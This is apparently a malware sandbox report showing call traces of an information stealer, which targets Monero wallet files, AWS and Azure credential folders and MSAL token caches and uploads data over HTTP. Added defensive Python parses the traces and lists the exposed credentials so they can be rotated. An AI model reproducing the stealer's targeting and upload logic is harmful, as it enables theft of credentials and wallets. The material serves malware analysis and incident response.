                  • InternetCloseHandle.WININET(00000000), ref: 00FB5FBD
                  • HttpOpenRequestA.WININET(00000000,00C8E988,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB5BF8
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • InternetCloseHandle.WININET(00000000), ref: 00FB5FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: f42541e54188bdba1cedaa1cc486f19ce33c07e631009e0d3e24c4bebf7be1a1
                  • Instruction ID: 7b2dc6169614baa75a70efeee9b0d5bfaa9a276a9c7836ec8ea66625563c842e
                  • Opcode Fuzzy Hash: f42541e54188bdba1cedaa1cc486f19ce33c07e631009e0d3e24c4bebf7be1a1
                  • Instruction Fuzzy Hash: 62121C7182011DABDB18EBA0DD96FEEB338BF14704F5041ADB10A62091EF787A49DF65
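The API list above is the Joe Sandbox IDA plugin's call trace for one function of the sample: each bullet is `API.MODULE(arguments), ref: address`, nested bullets prefixed "Part of subcall function <addr>:" belong to a callee, and the String ID line uses `$` to separate the strings the function references (here a double quote and runs of dashes, which is consistent with a multipart/form-data body boundary, though the report itself does not say so). The sequence InternetOpenA, InternetConnectA (service type 00000003 = INTERNET_SERVICE_HTTP), HttpOpenRequestA with dwFlags 00400100, HttpSendRequestA and InternetReadFile is a complete HTTP exchange, and the `\Monero\wallet.keys` string passed through the sub-call shows what the request body is built from. The following is an added example, not part of the Joe Sandbox report, that parses lines in this trace format, decodes the HttpOpenRequestA flags using the constant values from the public wininet.h header, and tags the function with the behaviours its call order implies. The sample lines are excerpted from the block above; the list of sensitive path markers is assembled from strings elsewhere in this report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: call-trace lines excerpted from the function above.
SAMPLE_TRACE = r"""
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB59F8
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB5B93
• HttpOpenRequestA.WININET(00000000,00C8E988,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB5BF8
  • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB5F2F
• InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FB5F4C
• InternetCloseHandle.WININET(00000000), ref: 00FB5FC7
"""

# One trace line: optional "Part of subcall function <addr>:" prefix, API.MODULE(args), ref: <addr>.
# Lines such as "wsprintfA.USER32 ref: 00FC8459" carry no argument list, so the parentheses are optional.
CALL_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# HttpOpenRequestA dwFlags bits (values from wininet.h).
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}

# Top-level call order that makes up one WinINet HTTP exchange.
HTTP_SEQUENCE = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA"]

# Path fragments marking credential/wallet theft targets (taken from strings in this report).
SENSITIVE_MARKERS = ("wallet.keys", "\\.aws\\", "\\.azure\\", "msal.cache")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int]  # callee address when the line is a "Part of subcall" entry


def parse_hex(arg: str) -> Optional[int]:
    """Integer value of an 8-digit hex argument; None for '?' placeholders and string arguments."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue  # headings and metadata lines are not calls
        args = m.group("args")
        calls.append(Call(
            api=m.group("api"),
            module=m.group("module"),
            args=args.split(",") if args else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Split a bitmask into named flags, highest bit first; unknown bits are kept as hex."""
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def summarize(calls: List[Call]) -> dict:
    """Tag a function with the behaviours its call sequence implies."""
    top = [c for c in calls if c.subcall_of is None]
    apis = [c.api for c in top]
    remaining = iter(apis)  # in-order subsequence test: each wanted API must follow the previous one
    http_exchange = all(any(a == want for a in remaining) for want in HTTP_SEQUENCE)
    request_flags: List[str] = []
    for c in top:
        if c.api == "HttpOpenRequestA" and len(c.args) >= 7:
            value = parse_hex(c.args[6])  # dwFlags is the seventh parameter
            if value is not None:
                request_flags = decode_flags(value, INTERNET_FLAGS)
    sensitive = sorted({
        a for c in calls for a in c.args
        if any(marker.lower() in a.lower() for marker in SENSITIVE_MARKERS)
    })
    return {
        "http_exchange": http_exchange,
        "reads_response": "InternetReadFile" in apis,
        "request_flags": request_flags,
        "sensitive_args": sensitive,
    }
```

Run `summarize(parse_trace(SAMPLE_TRACE))` to get the tags for this function; the flags decode to INTERNET_FLAG_KEEP_CONNECTION and INTERNET_FLAG_PRAGMA_NOCACHE, i.e. a persistent connection with caching disabled, which is what a beacon that uploads and then reads a response wants. Pasting the API lists of the other functions in this report into `parse_trace` gives a per-function capability summary without reading each list by hand.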
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBCF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FBD0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FBD0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD208
                  • lstrcat.KERNEL32(?,00FD1478), ref: 00FBD217
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD22A
                  • lstrcat.KERNEL32(?,00FD147C), ref: 00FBD239
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD24C
                  • lstrcat.KERNEL32(?,00FD1480), ref: 00FBD25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD26E
                  • lstrcat.KERNEL32(?,00FD1484), ref: 00FBD27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD290
                  • lstrcat.KERNEL32(?,00FD1488), ref: 00FBD29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD2B2
                  • lstrcat.KERNEL32(?,00FD148C), ref: 00FBD2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00FBD2D4
                  • lstrcat.KERNEL32(?,00FD1490), ref: 00FBD2E3
                    • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                    • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                  • lstrlen.KERNEL32(?), ref: 00FBD32A
                  • lstrlen.KERNEL32(?), ref: 00FBD339
                    • Part of subcall function 00FCAA70: StrCmpCA.SHLWAPI(00C890C8,00FBA7A7,?,00FBA7A7,00C890C8), ref: 00FCAA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBD3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 36f6d01f923ad77e1f2dae5d29fb19060655bf66d27383f7f3054c31393c8e62
                  • Instruction ID: e5d37f05e7247a4c617becaff2a770bb74c5affb23580c12880925f171f5c9e2
                  • Opcode Fuzzy Hash: 36f6d01f923ad77e1f2dae5d29fb19060655bf66d27383f7f3054c31393c8e62
                  • Instruction Fuzzy Hash: 68E13D71910109ABCB18EBA0EE96FEE7378BF54305F10416CF116A7091DE39BE45EB62
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00C8D110,00000000,?,00FD144C,00000000,?,?), ref: 00FBCA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FBCA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00FBCA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FBCAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FBCAD9
                  • StrStrA.SHLWAPI(?,00C8D380,00FD0B52), ref: 00FBCAF7
                  • StrStrA.SHLWAPI(00000000,00C8D158), ref: 00FBCB1E
                  • StrStrA.SHLWAPI(?,00C8DC80,00000000,?,00FD1458,00000000,?,00000000,00000000,?,00C890F8,00000000,?,00FD1454,00000000,?), ref: 00FBCCA2
                  • StrStrA.SHLWAPI(00000000,00C8DC20), ref: 00FBCCB9
                    • Part of subcall function 00FBC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FBC871
                    • Part of subcall function 00FBC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FBC87C
                  • StrStrA.SHLWAPI(?,00C8DC20,00000000,?,00FD145C,00000000,?,00000000,00C890B8), ref: 00FBCD5A
                  • StrStrA.SHLWAPI(00000000,00C891D8), ref: 00FBCD71
                    • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B46), ref: 00FBC943
                    • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B47), ref: 00FBC957
                    • Part of subcall function 00FBC820: lstrcat.KERNEL32(?,00FD0B4E), ref: 00FBC978
                  • lstrlen.KERNEL32(00000000), ref: 00FBCE44
                  • CloseHandle.KERNEL32(00000000), ref: 00FBCE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 4a426e9d8f9480b05e38e1c6c3f654b81e306a547a54e68a7b8f12d51543d395
                  • Instruction ID: a92b4db2048705f4be2293c1e12a687ed5d9295ce8b002cad8923ad5d5372d0b
                  • Opcode Fuzzy Hash: 4a426e9d8f9480b05e38e1c6c3f654b81e306a547a54e68a7b8f12d51543d395
                  • Instruction Fuzzy Hash: 34E1FB7190010DABDB18EBA0ED96FEEB778AF14304F40416DF10667191EF387A8ADB65
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • RegOpenKeyExA.ADVAPI32(00000000,00C8B048,00000000,00020019,00000000,00FD05B6), ref: 00FC83A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00FC8426
                  • wsprintfA.USER32 ref: 00FC8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00FC847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC8499
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                  • Instruction ID: 2d0839f1ac47048e90e41959b299d8701b6f9a1f6ef9b0de5b88adbc9148c2cd
                  • Opcode Fuzzy Hash: 0ff311b843c2e9362e18405ba22cb39c948d7cec5a6574c88e31aad67374d1f3
                  • Instruction Fuzzy Hash: 4981297191011DABDB28DB50DD96FEAB7B8BF08704F00829DE10AA7180DF756E86DF90
                  APIs
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00FC4DCD
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                    • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00FC4E59
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                    • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                    • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00FC4EE5
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49B0
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD08D2), ref: 00FC49C5
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC49E2
                    • Part of subcall function 00FC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00FC4A1E
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00C8EA18), ref: 00FC4A4A
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FF8), ref: 00FC4A5C
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A70
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,00FD0FFC), ref: 00FC4A82
                    • Part of subcall function 00FC4910: lstrcat.KERNEL32(?,?), ref: 00FC4A96
                    • Part of subcall function 00FC4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00FC4AAC
                    • Part of subcall function 00FC4910: DeleteFileA.KERNEL32(?), ref: 00FC4B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 4e4f9e8ac05995c67017c0f8dab0f94233d2ed8b8ab140c570ef5fe9c47fedff
                  • Instruction ID: a06b5194cb987a36f9b79701a890cc914734e96c7fd5c5b841d3afa1c044b8c6
                  • Opcode Fuzzy Hash: 4e4f9e8ac05995c67017c0f8dab0f94233d2ed8b8ab140c570ef5fe9c47fedff
                  • Instruction Fuzzy Hash: 1641D57A94020867D724F770EC47FED3738AB24704F044458B149A61C1EEF8ABC9AB93
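The function above is the cloud-credential collector: it appends `\.azure\`, `\.aws\` and `\.IdentityService\` to a base path, walks each directory with `FindFirstFileA`/`FindNextFileA` (the `*.*` strings are the search patterns), filters names with `PathMatchSpecA` (the `msal.cache` string), copies each selected file out with `CopyFileA` and later removes the staging copy with `DeleteFileA`. The base path comes from the sub-call to `SHGetFolderPathA` with CSIDL 0x1C. What an incident responder needs from this block is the list of files on an affected profile that this walk would have selected, with hashes and timestamps, so the right keys and tokens get rotated. The following is an added example, not part of the Joe Sandbox report, that reproduces the selection logic in Python against a directory you pass in. The target directories and patterns are the strings above; pairing `msal.cache` with `.IdentityService` and `*.*` with the other two is an inference from the string list; the rotation hints and the constructed sample files are assumptions based on the standard AWS CLI, Azure CLI and MSAL cache layouts, not strings from the sample.

```python
import hashlib
import os
import tempfile
from datetime import datetime, timezone
from fnmatch import fnmatch
from pathlib import Path
from typing import Dict, List

# Directories (relative to the profile root) and filename patterns taken from the strings above.
TARGETS: Dict[str, List[str]] = {
    ".azure": ["*.*"],
    ".aws": ["*.*"],
    ".IdentityService": ["msal.cache"],
}

# Assumed mapping from a harvested file to the credential that must be rotated. These file names are the
# standard layouts of the AWS CLI, Azure CLI and the Microsoft identity cache, not strings from the sample.
ROTATION_HINTS = {
    ".aws/credentials": "AWS access keys of every profile in the file",
    ".azure/msal_token_cache.bin": "Azure CLI refresh/access tokens (revoke sessions)",
    ".azure/accessTokens.json": "Azure CLI tokens (legacy cache)",
    ".IdentityService/msal.cache": "MSAL tokens used by Visual Studio / Azure tooling",
}


def name_matches(name: str, pattern: str) -> bool:
    """Mirror FindFirstFileA/PathMatchSpecA semantics: '*.*' matches every name, with or without a dot."""
    return True if pattern == "*.*" else fnmatch(name.lower(), pattern.lower())


def inventory(profile_root) -> List[dict]:
    """List the files under profile_root that the harvester's directory walk would copy out."""
    root = Path(profile_root)
    found = []
    for rel, patterns in TARGETS.items():
        base = root / rel
        if not base.is_dir():
            continue
        for dirpath, _dirs, files in os.walk(base):  # the sample recurses, so walk subdirectories too
            for name in files:
                if not any(name_matches(name, p) for p in patterns):
                    continue
                path = Path(dirpath) / name
                st = path.stat()
                relpath = path.relative_to(root).as_posix()
                found.append({
                    "path": relpath,
                    "bytes": st.st_size,
                    "sha256": hashlib.sha256(path.read_bytes()).hexdigest(),
                    "mtime_utc": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
                    "rotate": ROTATION_HINTS.get(relpath, "review contents"),
                })
    return sorted(found, key=lambda f: f["path"])


def make_sample_profile() -> Path:
    """Create a constructed profile tree in a temp dir (sample data only, not taken from any real host)."""
    root = Path(tempfile.mkdtemp(prefix="profile_"))
    files = {
        ".aws/credentials": "[default]\naws_access_key_id = AKIAEXAMPLE\n",
        ".aws/config": "[default]\nregion = eu-west-1\n",
        ".azure/azureProfile.json": "{}",
        ".azure/msal_token_cache.bin": "opaque",
        ".IdentityService/msal.cache": "opaque",
        ".IdentityService/readme.txt": "not selected: the pattern for this directory is msal.cache only",
        "Documents/notes.txt": "not selected: the directory is not targeted",
    }
    for rel, content in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return root
```

On a real host run `inventory(r"C:\Users\<name>")` (the directories live under the user profile for the AWS and Azure CLIs); the `sha256` column lets you match the files against anything recovered from the C2 upload, and the `rotate` column is the starting point for the rotation checklist. Note the `*.*` special case: Win32 treats that pattern as "every file", so a credentials file without an extension is selected too, which a naive glob would miss.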
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FC906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
